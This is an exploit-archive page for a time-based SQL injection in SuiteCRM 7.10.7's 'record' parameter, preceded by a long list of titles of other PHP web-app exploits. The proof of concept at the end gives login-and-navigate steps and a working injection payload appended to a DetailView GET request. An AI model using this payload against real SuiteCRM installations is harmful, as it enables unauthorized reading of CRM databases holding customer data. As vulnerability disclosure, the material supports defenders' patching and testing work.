Menu

"SuiteCRM 7.10.7 - 'record' SQL Injection"

Author

"Mehmet EMIROGLU"

Platform

php

Release date

2019-02-04

Release Date Title Type Platform Author
2019-02-15 "UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload" webapps php "Mohammad Danish"
2019-02-15 "qdPM 9.1 - 'search_by_extrafields[]' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-15 "MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php 0xB9
2019-02-14 "LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)" webapps php 0xB9
2019-02-14 "WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection" webapps php B0UG
2019-02-14 "DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting" webapps php "Mohammed Abdul Kareem"
2019-02-14 "DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting" webapps php "Mohammed Abdul Kareem"
2019-02-14 "DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2019-02-14 "DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2019-02-14 "DomainMOD 4.11.01 - 'ssl-provider-name' Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2019-02-13 "PilusCart 1.4.1 - 'send' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-13 "Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting" webapps php "Mehmet EMIROGLU"
2019-02-12 "LayerBB 1.1.2 - Cross-Site Scripting" webapps php 0xB9
2019-02-12 "OPNsense < 19.1.1 - Cross-Site Scripting" webapps php "Ozer Goker"
2019-02-11 "Webiness Inventory 2.3 - 'email' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-11 "VA MAX 8.3.4 - Authenticated Remote Code Execution" webapps php "Cody Sixteen"
2019-02-11 "MyBB Bans List 1.0 - Cross-Site Scripting" webapps php 0xB9
2019-02-06 "osCommerce 2.3.4.1 - 'reviews_id' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-06 "osCommerce 2.3.4.1 - 'products_id' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-06 "osCommerce 2.3.4.1 - 'currency' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-11 "NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)" remote php Metasploit
2019-02-04 "SuiteCRM 7.10.7 - 'record' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-04 "SuiteCRM 7.10.7 - 'parentTab' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-04 "ResourceSpace 8.6 - 'watched_searches.php' SQL Injection" webapps php dd_
2016-07-07 "Tiki Wiki 15.1 - File Upload" webapps php "Ivan Ivanovic"
2019-01-30 "Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-01-29 "PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)" webapps php dd_
2019-01-28 "ResourceSpace 8.6 - 'collection_edit.php' SQL Injection" webapps php dd_
2019-01-28 "MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting" webapps php 0xB9
2019-01-28 "Mess Management System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-28 "Teameyo Project Management System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-28 "Care2x 2.7 (HIS) Hospital Information System - Multiple SQL Injection" webapps php "Carlos Avila"
2019-01-28 "Newsbull Haber Script 1.0.0 - 'search' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-01-28 "CMSsite 1.0 - 'search' SQL Injection" webapps php "Majid kalantari"
2019-01-28 "CMSsite 1.0 - 'cat_id' SQL Injection" webapps php "Majid kalantari"
2019-01-28 "WordPress Plugin Ad Manager WD 1.0.11 - Arbitrary File Download" webapps php 41!kh4224rDz
2019-01-25 "Wordpress Plugin Wisechat 2.6.3 - Reverse Tabnabbing" webapps php MTK
2019-01-25 "GreenCMS 2.x - Arbitrary File Download" webapps php "Ihsan Sencan"
2019-01-25 "GreenCMS 2.x - SQL Injection" webapps php "Ihsan Sencan"
2019-01-24 "ImpressCMS 1.3.11 - 'bid' SQL Injection" webapps php "Mehmet Onder"
2019-01-24 "SimplePress CMS 1.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-24 "Joomla! Component JHotelReservation 6.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-24 "Joomla! Component J-CruisePortal 6.0.4 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component VMap 1.9.6 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vRestaurant 1.9.4 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vReview 1.9.11 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vWishlist 1.0.1 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vBizz 1.0.7 - Remote Code Execution" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vBizz 1.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-22 "Joomla! Component Easy Shop 1.2.3 - Local File Inclusion" webapps php "Ihsan Sencan"
2019-01-21 "Adianti Framework 5.5.0 - SQL Injection" webapps php "Joner de Mello Assolin"
2019-01-21 "PHP Uber-style GeoTracking 1.1 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "PHP Dashboards NEW 5.8 - Local File Inclusion" webapps php "Ihsan Sencan"
2019-01-21 "PHP Dashboards NEW 5.8 - 'dashID' SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "MoneyFlux 1.0 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "Reservic 1.0 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "Coman 1.0 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "Kepler Wallpaper Script 1.1 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-18 "Pydio / AjaXplorer < 5.0.4 - Unauthenticated Arbitrary File Upload" webapps php _jazz______
2019-01-18 "Joomla! Core 3.9.1 - Persistent Cross-Site Scripting in Global Configuration Textfilter Settings" webapps php "Praveen Sutar"
2019-01-18 "phpTransformer 2016.9 - Directory Traversal" webapps php "Ihsan Sencan"
2019-01-18 "phpTransformer 2016.9 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-18 "SeoToaster Ecommerce / CRM / CMS 3.0.0 - Local File Inclusion" webapps php "Ihsan Sencan"
2019-01-16 "Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit" webapps php "Larry W. Cashdollar"
2019-01-16 "ShoreTel / Mitel Connect ONSITE 19.49.5200.0 - Remote Code Execution" webapps php twosevenzero
2019-01-16 "doorGets CMS 7.0 - Arbitrary File Download" webapps php "Ihsan Sencan"
2019-01-16 "Roxy Fileman 1.4.5 - Arbitrary File Download" webapps php "Ihsan Sencan"
2019-01-15 "ownDMS 4.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Bigcart - Ecommerce Multivendor System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Job Portal Platform 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Real Estate Custom Script 2.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "ThinkPHP 5.X - Remote Command Execution" webapps php vr_system
2019-01-14 "Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account)" webapps php AllenChen
2019-01-14 "HealthNode Hospital Management System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Cleanto 5.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Find a Place CMS Directory 1.5 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Craigs Classified Ads CMS Theme 1.0.2 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Live Call Support Widget 1.5 - Remote Code Execution / SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Live Call Support Widget 1.5 - Cross-Site Request Forgery (Add Admin)" webapps php "Ihsan Sencan"
2019-01-14 "Twilio WEB To Fax Machine System Application 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Modern POS 1.3 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Modern POS 1.3 - Arbitrary File Download" webapps php "Ihsan Sencan"
2019-01-14 "Horde Imp - 'imap_open' Remote Command Execution" webapps php "Paolo Serracino_ Pietro Minniti_ Damiano Proietti"
2019-01-14 "i-doit CMDB 1.12 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "i-doit CMDB 1.12 - Arbitrary File Download" webapps php "Ihsan Sencan"
2019-01-11 "Joomla! Component JoomCRM 1.1.1 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-11 "Joomla! Component JoomProject 1.1.3.2 - Information Disclosure" webapps php "Ihsan Sencan"
2019-01-11 "Adapt Inventory Management System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "eBrigade ERP 4.5 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "Event Locations 1.0.1 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "Event Calendar 3.7.4 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "MLMPro 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "Architectural 1.0 - 'email' SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "Shield CMS 2.2 - 'email' SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "doitX 1.0 - 'search' SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "Matrix MLM Script 1.0 - Information Disclosure" webapps php "Ihsan Sencan"
2019-01-10 "eBrigade ERP 4.5 - Arbitrary File Download" webapps php AkkuS
2019-01-10 "PEAR Archive_Tar < 1.4.4 - PHP Object Injection" webapps php "Fariskhi Vidyan"
2019-01-08 "Dolibarr ERP-CRM 8.0.4 - 'rowid' SQL Injection" webapps php "Mehmet Onder"
2019-01-08 "CF Image Hosting Script 1.6.5 - (Delete all Pictures) Privilege Escalation" webapps php "David Tavarez"
2019-01-07 "Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal" webapps php "Pongtorn Angsuchotmetee_ Vittawat Masaree"
2019-01-07 "MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection" webapps php "Mehmet Onder"
2019-01-07 "Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation" webapps php "Noman Riffat"
2019-01-07 "phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php "Ozer Goker"
2019-01-07 "MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting" webapps php 0xB9
2019-01-07 "LayerBB 1.1.1 - Persistent Cross-Site Scripting" webapps php 0xB9
2019-01-07 "All in One Video Downloader 1.2 - Authenticated SQL Injection" webapps php "Deyaa Muhammad"
2019-01-07 "Embed Video Scripts - Persistent Cross-Site Scripting" webapps php "Deyaa Muhammad"
2019-01-02 "Vtiger CRM 7.1.0 - Remote Code Execution" webapps php AkkuS
2019-01-02 "Frog CMS 0.9.5 - Cross-Site Scripting" webapps php WangDudu
2019-01-02 "WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection" webapps php Kaimi
2018-12-27 "WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload" webapps php Kaimi
2018-12-27 "bludit Pages Editor 3.0.0 - Arbitrary File Upload" webapps php BouSalman
2018-12-27 "WordPress Plugin Audio Record 1.0 - Arbitrary File Upload" webapps php Kaimi
2018-12-27 "Craft CMS 3.0.25 - Cross-Site Scripting" webapps php "Raif Berkay Dincel"
2018-11-30 "PhpSpreadsheet < 1.5.0 - XML External Entity (XXE)" webapps php "Alex Leahu"
2018-12-15 "phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read" webapps php VulnSpy
2018-12-24 "FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection" webapps php "Sainadh Jamalpur"
2018-12-24 "WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)" webapps php linfeng
2018-12-24 "WSTMart 2.0.8 - Cross-Site Scripting" webapps php linfeng
2018-12-21 "ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)" webapps php mqt
2018-12-19 "Yeswiki Cercopitheque - 'id' SQL Injection" webapps php "Mickael BROUTY"
2018-12-19 "Bolt CMS < 3.6.2 - Cross-Site Scripting" webapps php "Raif Berkay Dincel"
2018-12-19 "Integria IMS 5.0.83 - Cross-Site Request Forgery" webapps php "Javier Olmedo"
2018-12-19 "Integria IMS 5.0.83 - 'search_string' Cross-Site Scripting" webapps php "Javier Olmedo"
2018-12-19 "Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)" webapps php AkkuS
2018-12-19 "Hotel Booking Script 3.4 - Cross-Site Request Forgery (Change Admin Password)" webapps php "Sainadh Jamalpur"
2018-12-14 "Double Your Bitcoin Script Automatic - Authentication Bypass" webapps php Veyselxan
2018-12-14 "Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution" webapps php "Ihsan Sencan"
2018-12-14 "Facebook And Google Reviews System For Businesses 1.1 - SQL Injection" webapps php "Ihsan Sencan"
2018-12-14 "Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery (Change Admin Password)" webapps php Veyselxan
2018-12-14 "Responsive FileManager 9.13.4 - Multiple Vulnerabilities" webapps php "Fariskhi Vidyan"
2018-12-11 "ThinkPHP 5.0.23/5.1.31 - Remote Code Execution" webapps php VulnSpy
2018-12-11 "WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection" webapps php Kaimi
2018-12-11 "HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection" webapps php "Sainadh Jamalpur"
2014-02-17 "IceWarp Mail Server 11.0.0.0 - Cross-Site Scripting" webapps php "Usman Saeed"
2018-12-11 "DomainMOD 4.11.01 - Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2018-12-11 "PrestaShop 1.6.x/1.7.x - Remote Code Execution" webapps php "Fariskhi Vidyan"
2018-12-11 "Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery" webapps php "Ihsan Sencan"
2018-12-11 "Tourism Website Blog - Remote Code Execution / SQL Injection" webapps php "Ihsan Sencan"
2018-12-09 "DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2018-12-09 "Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting" webapps php "Gustavo Sorondo"
2018-12-09 "i-doit CMDB 1.11.2 - Remote Code Execution" webapps php AkkuS
2018-12-05 "HasanMWB 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2018-12-04 "FreshRSS 1.11.1 - Cross-Site Scripting" webapps php Netsparker
2018-12-04 "DomainMOD 4.11.01 - Registrar Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2018-12-04 "NUUO NVRMini2 3.9.1 - Authenticated Command Injection" webapps php "Artem Metla"
2018-12-04 "DomainMOD 4.11.01 - Custom SSL Fields Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2018-12-04 "DomainMOD 4.11.01 - Custom Domain Fields Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2018-12-04 "Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting" webapps php AkkuS
2018-12-04 "KeyBase Botnet 1.5 - SQL Injection" webapps php n4pst3r
2018-12-04 "DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2018-12-03 "WordPress Plugin Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting" webapps php "Loading Kura Kura"
2018-12-03 "PHP Server Monitor 3.3.1 - Cross-Site Request Forgery" webapps php "Javier Olmedo"
2018-12-03 "Joomla! Component JE Photo Gallery 1.1 - 'categoryid' SQL Injection" webapps php "Ihsan Sencan"
2018-12-03 "Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution" webapps php AkkuS
2018-11-26 "No-Cms 1.0 - 'order_by' SQL Injection" webapps php "Loading Kura Kura"
2018-11-26 "Ticketly 1.0 - 'kind_id' SQL Injection" webapps php "Javier Olmedo"
2018-11-26 "WordPress Plugins Easy Testimonials 3.2 - Cross-Site Scripting" webapps php En_dust
2018-11-21 "WebOfisi E-Ticaret V4 - 'urun' SQL Injection" webapps php AkkuS
2018-11-21 "WordPress CherryFramework Themes 3.1.4 - Backup File Download" webapps php b1p0l4r
2018-11-21 "Ticketly 1.0 - 'name' SQL Injection" webapps php "Javier Olmedo"
2018-11-20 "Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)" webapps php "Javier Olmedo"
2018-11-16 "DomainMOD 4.11.01 - Cross-Site Scripting" webapps php "Dawood Ansar"
2018-11-16 "Helpdezk 1.1.1 - Arbitrary File Upload" webapps php "Ihsan Sencan"
2018-11-16 "Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection" webapps php "Ihsan Sencan"
2018-11-15 "Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting" webapps php MTK
2018-11-15 "PHP Mass Mail 1.0 - Arbitrary File Upload" webapps php "Ihsan Sencan"
2018-11-15 "2-Plan Team 1.0.4 - Arbitrary File Upload" webapps php "Ihsan Sencan"
2018-11-15 "Simple E-Document 1.31 - 'username' SQL Injection" webapps php "Ihsan Sencan"
2018-11-15 "Kordil EDMS 2.2.60rc3 - Arbitrary File Upload" webapps php "Ihsan Sencan"
2018-11-15 "Meneame English Pligg 5.8 - 'search' SQL Injection" webapps php "Ihsan Sencan"
2018-11-15 "EverSync 0.5 - Arbitrary File Download" webapps php "Ihsan Sencan"
2018-11-15 "Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection" webapps php "Ihsan Sencan"
2018-11-15 "Net-Billetterie 2.9 - 'login' SQL Injection" webapps php "Ihsan Sencan"
2018-11-15 "BitZoom 1.0 - 'rollno' SQL Injection" webapps php "Ihsan Sencan"
2018-11-15 "PHP-Proxy 5.1.0 - Local File Inclusion" webapps php "Ameer Pornillos"
2018-11-15 "Precurio Intranet Portal 2.0 - Cross-Site Request Forgery (Add Admin)" webapps php "Ihsan Sencan"
2018-11-14 "DoceboLMS 1.2 - SQL Injection / Arbitrary File Upload" webapps php "Ihsan Sencan"
2018-11-14 "Electricks eCommerce 1.0 - Persistent Cross-Site Scripting" webapps php "Nawaf Alkeraithe"
2018-11-14 "Pedidos 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2018-11-14 "Rmedia SMS 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2018-11-14 "Advanced Comment System 1.0 - SQL Injection" webapps php "Rafael Pedrero"
2018-11-14 "EdTv 2 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2018-11-14 "Electricks eCommerce 1.0 - Cross-Site Request Forgery (Change Admin Password)" webapps php "Nawaf Alkeraithe"
2018-11-14 "Helpdezk 1.1.1 - 'query' SQL Injection" webapps php "Ihsan Sencan"
2018-11-14 "iServiceOnline 1.0 - 'r' SQL Injection" webapps php "Ihsan Sencan"
2018-11-13 "SIPve 0.0.2-R19 - SQL Injection" webapps php "Ihsan Sencan"
2018-11-13 "Webiness Inventory 2.3 - SQL Injection" webapps php "Ihsan Sencan"
2018-11-13 "Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery (Add Admin)" webapps php "Ihsan Sencan"
2018-11-13 "Maitra Mail Tracking System 1.7.2 - SQL Injection / Database File Download" webapps php "Ihsan Sencan"
2018-11-13 "Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload" webapps php "Ihsan Sencan"
2018-11-13 "ClipperCMS 1.3.3 - Cross-Site Request Forgery (File Upload)" webapps php "Ameer Pornillos"
2018-11-13 "Silurus Classifieds Script 2.0 - 'wcategory' SQL Injection" webapps php "Ihsan Sencan"
2018-11-13 "Gumbo CMS 0.99 - SQL Injection" webapps php "Ihsan Sencan"
2018-11-13 "ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin)" webapps php "Ihsan Sencan"
Release Date Title Type Platform Author
2019-02-15 "qdPM 9.1 - 'search_by_extrafields[]' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-13 "PilusCart 1.4.1 - 'send' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-13 "Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting" webapps php "Mehmet EMIROGLU"
2019-02-11 "Webiness Inventory 2.3 - 'email' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-06 "osCommerce 2.3.4.1 - 'reviews_id' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-06 "osCommerce 2.3.4.1 - 'products_id' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-06 "osCommerce 2.3.4.1 - 'currency' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-04 "SuiteCRM 7.10.7 - 'record' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-04 "SuiteCRM 7.10.7 - 'parentTab' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-01-30 "Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-01-28 "Newsbull Haber Script 1.0.0 - 'search' SQL Injection" webapps php "Mehmet EMIROGLU"

Unfortunately we've not tracked down any possible victims.

Ads

####################################################################

# Exploit Title: SuiteCRM 7.10.7 - 'record' SQL Vulnerabilities
# Dork: N/A
# Date: 03-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://suitecrm.com/
# Software Link: https://suitecrm.com/download/
# Version: 7.10.7
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A
# Software Description: SuiteCRM was awarded the 2015 BOSSIE by InfoWorld
  as the world's best open source Customer Relationship Management (CRM)
application.

####################################################################

# Vulnerabilities
# This web application called as SuiteCRM 7.10.7 version.
# After logging in, enter the user section. then view the user details.
  Add the following codes to the end of the URL.

####################################################################

# POC - SQL (Time Based)
# Parameters : record
# Attack Pattern : aNd if(length(0x454d49524f474c55)>1,sleep(5),0)
# GET Request :
http://localhost/SuiteCRM/index.php?module=Users&action=DetailView&record=1
aNd if(length(0x454d49524f474c55)>1,sleep(5),0)

####################################################################